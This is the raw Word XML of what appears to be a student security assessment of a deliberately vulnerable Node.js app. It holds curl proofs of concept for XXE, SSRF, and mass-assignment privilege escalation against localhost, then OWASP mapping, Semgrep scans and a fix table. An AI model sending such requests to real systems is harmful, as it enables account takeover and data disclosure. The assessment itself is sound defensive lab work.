          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5257800" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture 20" descr="v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 descr="v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Sensitive system files can be read.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Disclosure of sensitive server information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V7 – XML External Entity Injection (XXE)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POST /v1/admin/new-beer-xml/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC: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>curl -X POST http://localhost:5000/v1/admin/new-beer-xml/ \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 -H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"Content-Type: multipart/form-data"</w:t>
      </w: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\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 -F </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"file=@xxe.xml"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5257800" cy="666750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture 23" descr="v7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 descr="v7.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38625" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="Picture 24" descr="v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4" descr="v7.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External XML entities are processed by the server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File disclosure and potential server-side request forgery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V8 – Server-Side Request Forgery (SSRF)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GET /v1/test/?url=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC: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curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://localhost:5000/v1/test/?url=http://[::1]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5276850" cy="447675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="Picture 32" descr="v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2" descr="v8.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The server makes requests to internal resources.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An attacker can access internal services and metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>V9 – Mass Assignment &amp; Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Endpoint:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t>PUT /v1/user/{id}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC (Vertical Privilege Escalation):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curl -X PUT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://localhost:5000/v1/user/1"</w:t>
      </w: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\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-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"Content-Type: application/json"</w:t>
      </w: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\</w:t>
      </w:r>
    </w:p>
    <w:p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-d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>'{"role":"admin"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>PoC (Horizontal Privilege Escalation):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curl -X PUT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://localhost:5000/v1/user/2"</w:t>
      </w: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\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="8"/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-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>"Content-Type: application/json"</w:t>
      </w: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\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>'{"password":"HACKED_BY_ABDO_ISLAM"}'</w:t>
      </w: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ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:cs/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="cs" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:cs/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2590800" cy="819150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="Picture 33" descr="v9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3" descr="v9.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67000" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture 34" descr="v9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4" descr="v9.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hint="cs"/>
          <w:cs/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:cs/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4162425" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="Picture 37" descr="v9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7" descr="v9.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3" r="615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</w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>The application allows modification of sensitive fields without authorization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>An attacker can fully compromise user accounts and gain administrator privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:cs="Segoe UI Black"/>
        </w:rPr>
        <w:t>A3. Map Vulnerabilities to OWASP Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black"/>
          <w:cs/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblW w:w="7488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8"/>
        <w:gridCol w:w="2040"/>
        <w:gridCol w:w="2384"/>
        <w:gridCol w:w="2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508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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2040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Endpoint </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2384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OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2556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Impact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V1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/profile?id= {id}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Allows unauthorized users to access other users’ profiles by modifying the ID parameter.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V2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/profile?message=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(XSS)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Enables execution of arbitrary JavaScript in the victim’s browser, leading to session hijacking or data theft.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V3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/v1/redirect/?url=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Permits redirection to untrusted external sites, enabling phishing and social engineering attacks.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V4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/?message={{...}}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(SSTI)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Allows server-side template injection, potentially leading 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V5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/v1/status/{input}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(RCE)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Enables execution of arbitrary system commands on the server, resulting in full server compromise.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5" w:hRule="atLeast"/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V6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/v1/beer-pic/?picture=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Acess Control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spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0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Allows reading sensitive system files through directory traversal.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V7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POST /v1/new-beer-xml/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A05 – Security Misconfiguration (XXE)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Processes external XML entities, enabling file disclosure and internal network access.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V8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/v1/test/?url=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A10 – Server Side Request Forgery (SSRF)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val="en-US"/>
              </w:rPr>
              <w:t>Allows attackers to force the server to send requests to internal or restricted resources.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508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V9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="204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PUT /v1/user/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2384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</w:t>
            </w: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A04 – Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2556" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEADA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0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Enables mass assignment and privilege escalation, allowing attackers to modify other users’ data and gain admin privileges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black"/>
          <w:lang w:bidi="ar-EG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 xml:space="preserve">Phase B – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Static Analysis with Semgrep (SAST)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="SimSun" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="SimSun" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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 xml:space="preserve">B1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Run Semgrep with Existing Rules</w:t>
      </w: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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black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I ran Semgrep using the standard rulesets for Javascript, Node.js, and OWASP Top 10.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:b/>
          <w:bCs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Command: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semgrep --config "p/javascript" --config</w:t>
      </w:r>
      <w:r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FCFCFC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r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"p/nodejs" --config "p/owasp-top-ten" --json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/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Findings: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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r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  <w:t>The baseline scan found 16 issues, successfully identifying XSS and Path Traversal, but missing logic bugs like IDOR, RCE, and Mass Assignment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/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</w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/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color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="493728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28965" name="drawing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rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B2. Map DAST → Semgrep → Code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"/>
        <w:gridCol w:w="1535"/>
        <w:gridCol w:w="1407"/>
        <w:gridCol w:w="1999"/>
        <w:gridCol w:w="2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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535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Endpoint </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1407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OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1999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File:Lines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2971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Semgrep Rule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V1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/profile?id= {id}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Src/router/routes/frontend.js  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:105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Custom Rule Planned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V2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/profile?message=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(XSS)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Src/router/routes/frontend.js</w:t>
            </w:r>
          </w:p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:17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javascript.express.security.express-insecure-template-usage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V3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/v1/redirect/?url=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Src/router/routes/system.js</w:t>
            </w:r>
          </w:p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:37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javascript.express.security.audit.express-open-redirect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V4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/?message={{...}}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(SSTI)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Src/router/routes/frontend.js</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr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:17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javascript.express.security.express-insecure-template-usage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V5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/v1/status/{input}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A03 – Injection (RCE)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Src/router/routes/system.js</w:t>
            </w:r>
          </w:p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:15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Custom Rule Planned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V6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/v1/beer-pic/?picture=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Acess Control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Src/router/routes/order.js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:33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javascript.express.security.audit.express-path-join-resolve-traversal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V7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POST /v1/new-beer-xml/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A05 – Security Misconfiguration (XXE)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Src/router/routes/admin.js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:50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Custom Rule Planned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V8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/v1/test/?url=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A10 – Server Side Request Forgery (SSRF)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Src/router/routes/system.js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:84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Custom Rule Planned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10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V9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535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PUT /v1/user/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1407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A01 – Broken Access Control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</w:t>
            </w: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A04 – Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="199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Src/router/routes/user.js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:160</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="297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Custom Rule Planned</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B3. Custom Semgrep Rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r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I wrote a custom configuration (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DM Mono" w:hAnsi="DM Mono" w:eastAsia="DM Mono" w:cs="DM Mono"/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semgrep-rules/custom-rules.yaml</w:t>
      </w:r>
      <w:r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) to detect the specific patterns used in this application, specifically targeting the logic bugs missed by the baseline scan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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Custom Rules Scan Results:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r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 xml:space="preserve">My custom rules successfully detected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs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10 findings</w:t>
      </w:r>
      <w:r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  <w:t>, covering all missing vulnerabilities including the RCE, XXE, Mass Assignment, and IDOR</w:t>
      </w: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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="4067175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1649677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77219" name="drawing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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr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n-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="3429000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1551372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2105" name="drawing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rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phase C – Fix &amp; Harden</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:lang w:val="en-US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 xml:space="preserve">C1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Black" w:hAnsi="Segoe UI Black" w:eastAsia="Segoe UI Black" w:cs="Segoe UI Black"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implement Fixes</w:t>
      </w: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  <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblW w:w="9773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2100"/>
        <w:gridCol w:w="1477"/>
        <w:gridCol w:w="3009"/>
        <w:gridCol w:w="19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ABF8F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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2100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Vulnerability </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1477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File + line(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3009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High-level change</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1941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Why this is more secure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V1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IDOR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src/router/routes/frontend.js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:135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Added a session validation check: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if (req.query.id !==req.session.userId)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pP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Before the database query.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It ensures that the user requesting the data is the same user authenticated in the current session.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V2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Reflected      XSS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src/router/routes/frontend.js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:16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Removed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nunjucks.renderString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 and passed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message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 directly to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res.render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 as a local variable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By using the view engine correctly, the input is treated as data rather than executable code, preventing script execution.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V3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Open Redirect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src/router/routes/system.js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:37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Implemented a check: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if (url.startsWith(‘/’))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 before the redirect function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This forces the application to treat the URL as a relative path, preventing redirection to external malicious domains.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V4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SSTI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src/router/routes/frontend.js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:16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Removed the inline template rendering </w:t>
            </w:r>
            <w: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bidi="ar"/>
              </w:rPr>
              <w:t>function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 xml:space="preserve"> renderString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User input is no longer evaluated by the template engine, preventing server-side code execution via template logic.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V5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 RCE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src/router/routes/system.js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:15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Removed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child_process.execSync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 entirely. Replaced with an array whitelist check (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1"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[‘bud’, ‘coors’]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).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It eliminates the sink that executes shell commands. Input is strictly validated against a safe list of known values.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V6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Path Traversal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src/router/routes/order.js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:27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Implemented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path.basename(filename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and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path.join()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 xml:space="preserve">Path.basename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strips directory traversal characters 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(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../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)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, ensuring files can only be read from the intended directory.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V7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XXE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src/router/routes/admin.js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:50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Change XML parsing configuration from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{noent: true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} to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{noent: false}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en-US"/>
              </w:rPr>
              <w:t>Explicitly disabling entity expansion prevents the XML parser from resolving external entities or local files.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V8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SSRF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src/router/routes/system.js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:84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Added an allowlist of permitted domains and removed arbitrary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request.get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.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en-US"/>
              </w:rPr>
              <w:t>The server now only processes requests to pre-approved URLs, preventing it from acting as a proxy to internal networks.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46" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEADA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs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V9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
